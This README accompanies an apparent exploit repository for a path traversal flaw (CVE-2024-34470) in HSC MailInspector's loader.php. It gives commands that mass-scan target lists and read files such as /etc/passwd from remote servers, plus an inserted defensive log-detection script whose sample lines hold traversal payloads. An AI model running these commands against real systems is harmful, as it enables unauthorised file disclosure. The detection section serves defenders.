# HSC MailInspector - CVE-2024-34470
___
A critical vulnerability has been found in HSC Mailinspector up to version 5.2.18. This vulnerability affects an unknown functionality of the file /public/loader.php. Manipulating the 'path' argument with an unknown input leads to a path traversal vulnerability. According to CWE, this issue is classified as CWE-22. The product uses external input to construct a pathname intended to identify a file or directory located beneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location outside of the restricted directory. This affects confidentiality, integrity, and availability.
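
For defenders reviewing web server logs, the following added example (not part of this repository's scripts) flags requests to `/public/loader.php` whose `path` parameter contains a traversal sequence or an absolute path, including percent-encoded and double-encoded forms. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed input: common/combined access log format (client IP first, quoted request, status).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def fully_decode(value, max_rounds=5):
    """Undo repeated percent-encoding (e.g. %252e%252e) before inspection."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(path_value):
    """True if the value can escape a base directory: a '..' segment or an absolute path."""
    normalized = fully_decode(path_value).replace("\\", "/")
    return normalized.startswith("/") or ".." in normalized.split("/")

def find_loader_traversal(log_lines):
    """Return (client_ip, status, decoded_path) for suspicious loader.php requests."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/public/loader.php"):
            continue
        # parse_qs decodes once; fully_decode handles any remaining encoding layers.
        for value in parse_qs(url.query, keep_blank_values=True).get("path", []):
            if is_traversal(value):
                hits.append((m.group("ip"), int(m.group("status")), fully_decode(value)))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2024:10:00:01 +0000] "GET /public/loader.php?path=css/main.css HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2024:10:00:05 +0000] "GET /public/loader.php?path=../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jun/2024:10:00:09 +0000] "GET /public/loader.php?path=%252e%252e%252f%252e%252e%252fetc%252fhosts HTTP/1.1" 404 0',
    '203.0.113.4 - - [01/Jun/2024:10:01:00 +0000] "GET /index.php?path=../x HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, status, path in find_loader_traversal(SAMPLE_LOG):
        print(f"{ip} status={status} path={path}")
```

A hit answered with status 200 deserves priority during triage, since it may indicate that the server returned the requested file.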
___
## Installation
**Clone the repository:**
```bash
git clone https://CVE-2024-34470.git
cd CVE-2024-34470
```
**Install the dependencies:**
Make sure you have Python and pip installed. Then, run:
```bash
pip install -r requirements.txt
```
- This will install all the necessary dependencies to run the script.
___
## Use
### Script Description
To check multiple targets listed in a text file, use the script **Massive_CVE-2024-34470.py**:
```bash
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null
```
The _urls.txt_ file should list one base URL per line, in the following format:
```text
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443
```
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_1.png)
___
Once the vulnerable targets have been identified, use the script **CVE-2024-34470.py** to exploit the vulnerability and display the content of the specified file in the terminal.
```bash
# Read the contents of /etc/passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null
# Read the contents of /etc/hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts
```
![[screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-34470/blob/main/img/Screenshot_2.png)